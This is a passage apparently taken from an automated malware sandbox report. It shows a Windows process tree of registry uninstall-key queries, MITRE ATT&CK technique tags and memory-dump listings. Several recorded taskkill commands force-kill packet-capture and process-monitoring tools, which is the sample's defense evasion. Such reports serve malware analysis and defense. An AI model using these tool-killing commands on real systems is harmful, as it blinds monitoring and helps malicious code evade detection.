    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:1532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:1052
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:1088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    PID:1500
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1628
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    PID:472
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:1220
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:1464
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:1448
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:1648
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:1636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1556
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1332
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1892
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1864

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1648-67-0x0000000002350000-0x0000000002351000-memory.dmp

Filesize
4KB

Download
memory/1648-55-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/1648-130-0x0000000002830000-0x0000000002831000-memory.dmp

Filesize
4KB

Download
memory/1648-128-0x0000000002670000-0x0000000002671000-memory.dmp

Filesize
4KB

Download
memory/1648-109-0x00000000027F0000-0x00000000027F1000-memory.dmp

Filesize
4KB

Download
memory/1648-106-0x0000000002640000-0x0000000002641000-memory.dmp

Filesize
4KB

Download
memory/1648-61-0x0000000002440000-0x0000000002441000-memory.dmp

Filesize
4KB

Download
memory/1648-53-0x0000000002400000-0x0000000002401000-memory.dmp

Filesize
4KB

Download
memory/1648-32-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

Filesize
9.9MB

Download